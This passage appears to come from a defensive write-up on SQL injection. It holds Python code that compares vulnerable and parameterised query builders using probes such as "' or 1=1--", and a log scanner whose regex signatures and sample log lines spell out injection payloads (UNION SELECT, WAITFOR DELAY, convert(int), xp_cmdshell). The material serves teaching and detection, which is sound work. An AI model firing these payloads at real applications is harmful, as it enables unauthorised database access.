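        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, username FROM users WHERE id = ?"
    return conn.execute(sql, (int(user_id),)).fetchall()


def outcome(lookup, conn, value):
    """Run one lookup and summarise what happened, so the builders can be compared.

    "syntax error" is what the notes' direct-injection test (appending " OR")
    produces against a vulnerable builder; "rejected" is the safe builder
    refusing the same input before any SQL runs.
    """
    try:
        return "rows:%d" % len(lookup(conn, value))
    except sqlite3.OperationalError:
        return "syntax error"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    db = make_db()
    print("quoted, vulnerable :", vulnerable_quoted_login(db, "hi' or 1=1--", "x"))
    print("quoted, safe       :", safe_login(db, "hi' or 1=1--", "x"))
    print("direct probe, vuln :", outcome(vulnerable_direct_lookup, db, "1 OR"))
    print("direct probe, safe :", outcome(safe_lookup, db, "1 OR"))
```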

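As a second added example (mine, not from the post or evilsql.com), detection logic for the probe patterns catalogued in the notes, run over a handful of constructed web-server log lines in an assumed "date time method url status time-taken-ms" layout. It URL-decodes the request before matching, because the notes' own probes arrive with spaces encoded as + or %20, and it treats a WAITFOR probe whose response actually took the requested delay as a confirmed injection rather than a mere attempt.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures derived from the probe strings in the notes above. Each is a
# (label, regex) pair matched against the URL-decoded request.
SIGNATURES = [
    ("time-based blind", re.compile(r"waitfor\s+delay\s+'", re.I)),
    ("having/group-by enumeration", re.compile(r"\bhaving\s+1\s*=\s*1", re.I)),
    ("convert(int) error extraction", re.compile(r"convert\s*\(\s*int\s*,", re.I)),
    ("union column probing", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("order-by column counting", re.compile(r"\border\s+by\s+\d+\s*(/\*|--)", re.I)),
    ("system catalog read", re.compile(r"\b(sysobjects|information_schema\.columns)\b", re.I)),
    ("stored procedure abuse", re.compile(r"\b(xp_cmdshell|sp_makewebtask)\b", re.I)),
    ("boolean tautology", re.compile(r"\bor\s+'?\w+'?\s*=\s*'?\w+", re.I)),
]

# Constructed log lines (assumed layout: date time method url status ms).
# The last line with "red or blue" is benign and must not be flagged.
SAMPLE_LOG = """\
2008-01-08 05:28:58 GET /page.asp?id=1 200 12
2008-01-08 05:29:01 GET /page.asp?id=1%20having%201=1-- 500 15
2008-01-08 05:29:05 GET /page.asp?id=1%20or%201=convert(int,(USER))-- 500 14
2008-01-08 05:29:09 GET /page.asp?id=1%20UNION%20SELECT%20ALL%201,2,3,4-- 200 20
2008-01-08 05:29:15 GET /index.php?newsid=394%20order%20by%2012/* 200 18
2008-01-08 05:29:40 GET /page.asp?id=1;%20WAITFOR%20DELAY%20'00:00:10'-- 200 10412
2008-01-08 05:29:52 GET /search.asp?q=red%20or%20blue%20shirts 200 9
2008-01-08 05:30:00 GET /login.asp?user=hi'%20or%201=1--&pass=x 302 11
"""


def parse_line(line):
    """Split one log line into its fields and URL-decode the request."""
    date, time, method, url, status, ms = line.split()
    return {"ts": date + " " + time, "method": method,
            "url": unquote_plus(url), "status": int(status), "ms": int(ms)}


def classify(url):
    """Return the labels of every signature that matches the decoded URL."""
    return [label for label, rx in SIGNATURES if rx.search(url)]


def scan_log(text):
    """Return (timestamp, decoded url, labels) for each flagged line."""
    hits = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        labels = classify(rec["url"])
        if not labels:
            continue
        # A WAITFOR probe that really stalled the server for its full delay
        # shows the injected statement executed, not just that it was sent.
        if "time-based blind" in labels and rec["ms"] >= 10000:
            labels.append("delay observed: injection confirmed")
        hits.append((rec["ts"], rec["url"], labels))
    return hits


def summarize(hits):
    """Count how often each label fired across the flagged lines."""
    return Counter(label for _, _, labels in hits for label in labels)


if __name__ == "__main__":
    for ts, url, labels in scan_log(SAMPLE_LOG):
        print(ts, url, "->", ", ".join(labels))
    print(summarize(scan_log(SAMPLE_LOG)))
```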
